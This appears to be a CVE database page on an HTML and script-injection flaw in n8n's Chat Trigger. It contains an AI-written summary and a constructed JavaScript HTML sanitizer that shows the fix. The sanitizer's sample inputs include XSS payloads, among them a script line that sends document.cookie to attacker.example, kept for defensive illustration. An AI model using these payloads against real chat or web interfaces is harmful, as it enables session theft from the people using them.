VYPR
High severity · NVD Advisory · Published Sep 8, 2025 · Updated Sep 8, 2025

CVE-2025-56265

Description

An arbitrary file upload vulnerability in the Chat Trigger component of N8N v1.95.3, v1.100.1, and v1.101.1 allows attackers to execute arbitrary code via uploading a crafted HTML file.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

An arbitrary file upload vulnerability in n8n's Chat Trigger component allows attackers to execute arbitrary code via a crafted HTML file.

Vulnerability

Overview

CVE-2025-56265 describes an arbitrary file upload vulnerability in the Chat Trigger component of n8n, a workflow automation platform. The vulnerability affects versions v1.95.3, v1.100.1, and v1.101.1 [1]. The root cause is insufficient validation of uploaded content: HTML supplied through the chat trigger is not sanitized before it is rendered, so an attacker can upload a crafted HTML file that carries executable script.

Exploitation

To exploit this vulnerability, an attacker needs to reach a Chat Trigger node in an n8n workflow. No authentication is required when the Chat Trigger is exposed to unauthenticated users, as is common for public-facing chat workflows. By uploading a crafted HTML file, the attacker can inject script that executes in the context of the n8n editor or of webhook processing [2]. The fix in version 1.107.0 sanitizes the HTML-bearing chat inputs so that uploaded or configured HTML can no longer carry executable script [2][4].

Impact

Successful exploitation lets an attacker execute attacker-controlled code in the context of the n8n deployment, which the advisory treats as potentially leading to full compromise of the workflow automation environment: data exfiltration, lateral movement, or disruption of automated processes. The issue is rated High severity on this page because it can be triggered remotely and without authentication. One caveat for readers assessing exposure: the fix cited here is HTML sanitization of chat inputs [4], which addresses script execution in the browser of whoever views the chat interface; the references listed on this page do not describe a server-side execution path, so a reading of "arbitrary code on the n8n server" is not established by them.

Remediation

The vulnerability has been patched in n8n version 1.107.0, released on 2025-08-11 [2]. Users are strongly advised to upgrade to this version or later. The patch sanitizes the initialMessages parameter and the i18n config values with the sanitize-html library, strips dangerous URL protocols, and adds security test coverage [4]. Because the fix ships in the @n8n/n8n-nodes-langchain npm package, confirm that the installed version of that package is 1.107.0 or later, not only the n8n core version. No workarounds are available for unpatched versions.
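The two paragraphs above (exploitation through script-bearing HTML in the chat trigger, and the sanitize-html fix) are illustrated by the following added example. It is not n8n's code and does not reproduce the sanitize-html library; it is a minimal allow-list sanitizer in the same spirit, written in JavaScript because the chat interface and n8n itself are TypeScript/JavaScript. The policy, the initialMessages shape, the render functions and the sample payloads are constructed assumptions for illustration.

```javascript
// Added example, not n8n's code: a minimal allow-list HTML sanitizer in the
// spirit of the sanitize-html fix the advisory describes, applied to chat
// initialMessages before they are rendered. The policy, the message shape and
// the sample payloads below are constructed assumptions for illustration.

const DEFAULT_POLICY = {
  // tag -> attributes allowed on that tag; unlisted tags and attributes are dropped
  allowedTags: new Map([
    ["b", []], ["i", []], ["em", []], ["strong", []], ["p", []], ["br", []],
    ["ul", []], ["ol", []], ["li", []], ["code", []], ["pre", []],
    ["a", ["href", "title"]], ["img", ["src", "alt"]],
  ]),
  // disallowed tags whose contents are removed too, not just the tag itself
  dropContent: new Set(["script", "style", "iframe", "object", "embed"]),
  // schemes permitted in href/src; javascript:, data:, vbscript: etc. are rejected
  allowedSchemes: new Set(["http", "https", "mailto"]),
};

const escapeText = (s) => s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
const escapeAttr = (s) => escapeText(s).replace(/"/g, "&quot;");

// Browsers decode character references in attribute values before parsing the
// URL, so "&#106;avascript:" is javascript:. Decode numeric references first.
function decodeNumericEntities(s) {
  const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : "");
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)));
}

function isSafeUrl(value, policy) {
  // Control characters and whitespace are ignored by browsers inside a scheme
  // ("java\tscript:"), so strip them before looking at the scheme.
  const cleaned = decodeNumericEntities(value).replace(/[\u0000-\u0020]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return m === null || policy.allowedSchemes.has(m[1].toLowerCase()); // relative URLs pass
}

function sanitizeAttrs(tag, attrText, policy) {
  const allowed = policy.allowedTags.get(tag);
  const re = /([a-z][a-z0-9:-]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/gi;
  let out = "";
  for (let m; (m = re.exec(attrText)) !== null; ) {
    const name = m[1].toLowerCase();
    const value = m[2] ?? m[3] ?? m[4] ?? "";
    if (name.startsWith("on") || !allowed.includes(name)) continue; // event handlers never survive
    if ((name === "href" || name === "src") && !isSafeUrl(value, policy)) continue;
    out += ` ${name}="${escapeAttr(value)}"`;
  }
  return out;
}

function sanitizeHtml(input, policy = DEFAULT_POLICY) {
  let out = "";
  for (let i = 0; i < input.length; ) {
    const lt = input.indexOf("<", i);
    const gt = lt === -1 ? -1 : input.indexOf(">", lt);
    if (lt === -1 || gt === -1) { out += escapeText(input.slice(i)); break; }
    out += escapeText(input.slice(i, lt));
    i = gt + 1;
    const m = /^(\/?)([a-z][a-z0-9-]*)\s*([\s\S]*?)\/?$/i.exec(input.slice(lt + 1, gt));
    if (m === null) { out += escapeText(input.slice(lt, gt + 1)); continue; } // "<" that is not a tag
    const [, slash, rawName, attrText] = m;
    const name = rawName.toLowerCase();
    if (!policy.allowedTags.has(name)) {
      if (!slash && policy.dropContent.has(name)) {
        // skip everything up to and including the matching close tag
        const close = input.toLowerCase().indexOf(`</${name}`, i);
        if (close === -1) break;
        const closeEnd = input.indexOf(">", close);
        i = closeEnd === -1 ? input.length : closeEnd + 1;
      }
      continue;
    }
    out += slash ? `</${name}>` : `<${name}${sanitizeAttrs(name, attrText, policy)}>`;
  }
  return out;
}

// Vulnerable shape: configured strings rendered straight into the chat DOM.
const renderUnsafe = (msgs) => msgs.map((m) => `<div class="chat-message">${m}</div>`).join("\n");
// Hardened shape: every message goes through the sanitizer first.
const renderSafe = (msgs, policy = DEFAULT_POLICY) =>
  msgs.map((m) => `<div class="chat-message">${sanitizeHtml(m, policy)}</div>`).join("\n");

// Constructed sample: one benign message and four script-bearing payloads.
const SAMPLE_INITIAL_MESSAGES = [
  'Hi! Ask me about <b>orders</b> or <a href="https://example.com/help">see help</a>.',
  '<img src="x" onerror="alert(document.cookie)">',
  '<a href="java\tscript:alert(1)">click</a>',
  '<a href="&#106;avascript:alert(1)">click</a>',
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>after',
];

console.log(renderSafe(SAMPLE_INITIAL_MESSAGES));
```

The design point is the one the patch makes: rendering configuration-supplied HTML is only safe behind an allow list that drops unknown tags, removes the contents of script-like elements, rejects every `on*` attribute, and checks URL schemes after decoding character references and stripping control characters, since `java<TAB>script:` and `&#106;avascript:` are the same scheme to a browser.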

AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                     Ecosystem   Affected versions   Patched versions
@n8n/n8n-nodes-langchain    npm         < 1.107.0           1.107.0

Affected products (2)

  • N8N/N8N (source: description)
  • N8n Io/N8n (source: llm-fuzzy)
    Range: =1.95.3, =1.100.1, =1.101.1

Patches (0)

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References (7)

News mentions (0)

No linked articles in our index yet.